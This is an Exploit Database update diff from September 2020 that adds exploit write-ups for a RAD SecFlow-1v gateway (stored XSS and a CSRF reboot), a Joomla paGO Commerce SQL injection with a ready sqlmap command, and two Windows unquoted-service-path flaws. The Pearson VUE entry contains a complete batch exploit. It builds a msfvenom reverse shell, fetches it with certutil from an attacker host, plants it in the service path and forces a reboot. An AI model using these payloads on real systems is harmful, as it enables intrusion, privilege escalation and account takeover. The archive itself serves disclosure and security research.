DB: 2020-09-15

6 changes to exploits/shellcodes

Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
RAD SecFlow-1v SF_0290_2.3.01.26  - Persistent Cross-Site Scripting
RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)

exploits/hardware/webapps/48807.txt

@@ -0,0 +1,37 @@
+# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26  - Persistent Cross-Site Scripting
+# Date: 2020-08-31
+# Exploit Author: Jonatan Schor and Uriel Yochpaz
+# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
+# Version: SecFlow-1v os-image SF_0290_2.3.01.26
+# Tested on: RAD SecFlow-1v
+# CVE : N/A
+
+A Stored-XSS vulnerability was found in multiple pages in the web-based
+management interface of RAD SecFlow-1v.
+An attacker could exploit this vulnerability by uploading a malicious file
+as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as
+the static key file in Configuration-Services-Security-OpenVPN-Static Keys.
+These files content is presented to users while executing malicious stored
+JavaScript code.
+This could be exploited in conjunction with CVE-2020-13259
+
+# Proof of Concept
+Upload a file containing the following JS code:
+<img src=x onerror=alert(1)>
+Refresh the page and observe the malicious JS code execute every time you
+browse the compromised page.
+
+# Full Account Takeover
+As mentioned above, this exploit could be used in conjunction with
+CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file
+to a Stored-XSS vulnerabale page, which could allow Full Account Takeover.
+For further information and full PoC:
+https://github.com/UrielYochpaz/CVE-2020-13259
+
+# Timeline
+May 19th, 2020 - Vulnerability exposed.
+May 19th, 2020 – Vulnerability reported to RAD.
+May 21th, 2020 – Vulnerability reported to MITRE.
+May 21th, 2020 – MITRE assigned CVE: CVE-2020-13260.
+May 22th, 2020 – Contacted RAD for further details and cooperation.
+Aug 25th, 2020 – RAD patched the vulnerability.

exploits/hardware/webapps/48809.txt

@@ -0,0 +1,43 @@
+# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
+# Date: 2020-08-31
+# Exploit Author: Uriel Yochpaz and Jonatan Schor
+# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
+# Version: SecFlow-1v os-image SF_0290_2.3.01.26
+# Tested on: RAD SecFlow-1v
+# CVE : N/A
+
+A vulnerability in the web-based management interface of RAD SecFlow-1v
+could allow an unauthenticated, remote attacker to conduct a cross-site
+request forgery (CSRF) attack on an affected system.
+The vulnerability is due to insufficient CSRF protections for the web UI on
+an affected device.
+An attacker could exploit this vulnerability by persuading a user of the
+interface to follow a malicious link. A successful exploit could allow the
+attacker to perform arbitrary actions with the privilege level of the
+affected user.
+This could be exploited in conjunction with CVE-2020-13260.
+
+# Proof of Concept
+By persuading an authenticated user to open a web page containing the
+following code:
+<img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1">
+A reboot operation would begin.
+This attack could execute any operation available at the web-based
+management interface (File uploads, Scheduled and immediate reboots,
+Factory reset etc.)
+
+# Full Account Takeover
+As mentioned above, this exploit could be used in conjunction with
+CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a
+malicious file to a Stored-XSS vulnerabale page, which could allow Full
+Account Takeover.
+For further information and full PoC:
+https://github.com/UrielYochpaz/CVE-2020-13259
+
+# Timeline
+May 19th, 2020 - Vulnerability exposed.
+May 19th, 2020 – Vulnerability reported to RAD.
+May 21th, 2020 – Vulnerability reported to MITRE.
+May 21th, 2020 – MITRE assigned CVE: CVE-2020-13259.
+May 22th, 2020 – Contacted RAD for further details and cooperation.
+Aug 25th, 2020 – RAD patched the vulnerability.

exploits/php/remote/46698.rb

@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References' =>
         [
-          ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html']
+          ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],
           ['URL', 'http://cutephp.com'] # Official Website
         ],
       'Platform' => 'php',

exploits/php/webapps/48811.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)
+# Date: 2020-08-21
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.corephp.com/
+# Software Link: https://www.corephp.com/joomla-products/pago-commerce
+# Version: 2.5.9.0
+# Tested on: Apache2
+
+Vulnerable param: filter_published
+-------------------------------------------------------------------------
+POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 163
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments
+Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
+Upgrade-Insecure-Requests: 1
+
+filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
+
+-------------------------------------------------------------------------
+sqlmap poc:
+
+sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published
+
+
+[Gais Security]<https://www.gaissecurity.com>
+[Gais Security]
+[Gais Security]
+
+Mehmet KELEPÇE
+
+Penetration Tester | Red Team

exploits/windows/local/48808.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
+# Date: 2020-08-31
+# Exploit Author: Angelo D'Amato
+# Vendor Homepage: https://www.rapid7.com
+# Version: <=6.6.39
+# CVE :N/A
+
+Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation
+
+
+Vendor: Rapid7
+Product web page: https://www.rapid7.com
+Affected version: <=6.6.39
+
+Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support
+the entire vulnerability management lifecycle, including discovery, detection,
+verification, risk classification, impact analysis, reporting and mitigation.
+It integrates with Rapid7's Metasploit for vulnerability exploitation.
+
+Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path
+that contains an unquoted element, in which the element contains whitespace
+or other separators. This can cause the product to access resources in a parent
+path, allowing local privilege escalation.
+
+Tested on: Microsoft Windows 10 Enterprise, x64-based PC
+           Microsoft Windows Server 2016 Standard, x64-based PC
+
+
+Vulnerability discovered by Angelo D'Amato
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5587
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php
+
+
+07.08.2020
+
+--
+
+
+C:\Users\test>sc qc nexposeengine
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: nexposeengine
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Nexpose Scan Engine
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

exploits/windows/local/48810.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
+# Discovery by: Jok3r
+# Discovery Date: 2020-09-14
+# Vendor Homepage: https://home.pearsonvue.com/
+# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
+# Tested Version: 2.3.1911
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+#Description:
+
+The Application Wrapper is the component that automates the Pearson VUE
+Testing System. The Wrapper is a scheduler that runs in the background on
+the test center’s server.
+VUEApplicationWrapper service has an unquoted service path vulnerability
+and insecure file permissions on "\Pearson VUE\" directory that allows to
+overwrite by everyone
+so that unauthorized local user can leverage privileges to VUEService user
+that has administrative rights.
+
+# Detection of unquoted service path:
+
+C:\Users\VUEService>wmic service get name, pathname, displayname, startmode
+| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |
+findstr /i /v """
+VUE Application Wrapper
+VUEApplicationWrapper C:\Pearson VUE\VUE
+Testing System\bin\VUEWrapper.exe
+Auto
+
+C:\Users\VUEService>sc qc VUEApplicationWrapper
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VUEApplicationWrapper
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing
+System\bin\VUEWrapper.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : VUE Application Wrapper
+DEPENDENCIES : lanmanworkstation
+SERVICE_START_NAME : .\VUEService
+
+
+#Detection of insecure file permissions:
+
+PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
+
+
+Directory: C:\
+
+
+Path Owner Access
+---- ----- ------
+Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
+
+
+#Exploit code:
+
+@ECHO OFF
+ECHO [+] executing command: "wmic service get
+name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i
+"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
+wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |
+findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+sc qc VUEApplicationWrapper
+powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
+ECHO [+] Enumeration was completed successfully.
+::Create VUE.exe with following commands on your kali and serve it on port
+80. Also listen port 443 with netcat for reverse shell.
+::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>
+LPORT=443 -f exe > VUE.exe
+ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your
+privileges, you might be able to get VUEService user privileges after
+windows was rebooted.
+certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson
+VUE\VUE.exe"
+ECHO [*] Downloading VUE executable...
+PAUSE
+IF EXIST "C:\Pearson VUE\VUE.exe" (
+ECHO [+] The download was successful.
+) ELSE (
+ECHO [-] The download was unsuccessful.
+PAUSE
+)
+ECHO [!] If you continue, system will be rebooted.
+PAUSE
+shutdown /r /t 0
+::code end

files_exploits.csv

@@ -10379,6 +10379,8 @@ id,file,description,date,author,type,platform,port
 48796,exploits/windows/local/48796.py,"Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)",2020-09-09,"Felipe Winsnes",local,windows,
 48803,exploits/linux/local/48803.py,"Gnome Fonts Viewer 3.34.0 - Heap Corruption",2020-09-11,"Cody Winkler",local,linux,
 48806,exploits/windows/local/48806.txt,"Internet Explorer 11 - Use-After-Free",2020-09-11,"Simon Zuckerbraun",local,windows,
+48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
+48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40631,6 +40633,9 @@ id,file,description,date,author,type,platform,port
 48801,exploits/hardware/webapps/48801.sh,"ZTE Router F602W - Captcha Bypass",2020-09-10,"Hritik Vijay",webapps,hardware,
 48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple,
 48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple,
+48807,exploits/hardware/webapps/48807.txt,"RAD SecFlow-1v SF_0290_2.3.01.26  - Persistent Cross-Site Scripting",2020-09-14,"Jonatan Schor",webapps,hardware,
+48809,exploits/hardware/webapps/48809.txt,"RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)",2020-09-14,"Jonatan Schor",webapps,hardware,
+48811,exploits/php/webapps/48811.txt,"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)",2020-09-14,"Mehmet Kelepçe",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,